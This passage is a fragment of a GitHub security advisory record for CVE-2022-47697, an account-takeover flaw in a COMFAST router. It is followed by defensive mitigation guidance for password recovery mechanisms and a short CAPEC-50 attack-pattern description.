  "id": "GHSA-hppr-5p45-xr8c",
  "modified": "2023-02-08T03:30:25Z",
  "published": "2023-01-31T18:30:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-47697"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OlivierLaflamme/cve/blob/main/COMFAST/CF-WR623N/unauth_account_takeover"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Make sure that all input supplied by the user to the password recovery mechanism is thoroughly filtered and validated.

Mitigation
Architecture and Design

Do not use standard weak security questions and use several security questions.

Mitigation
Architecture and Design

Make sure that there is throttling on the number of incorrect answers to a security question. Disable the password recovery functionality after a certain (small) number of incorrect guesses.

Mitigation
Architecture and Design

Require that the user properly answers the security question prior to resetting their password and sending the new password to the e-mail address of record.

Mitigation
Architecture and Design

Never allow the user to control what e-mail address the new password will be sent to in the password recovery mechanism.

Mitigation
Architecture and Design

Assign a new temporary password rather than revealing the original password.

CAPEC-50: Password Recovery Exploitation

An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure.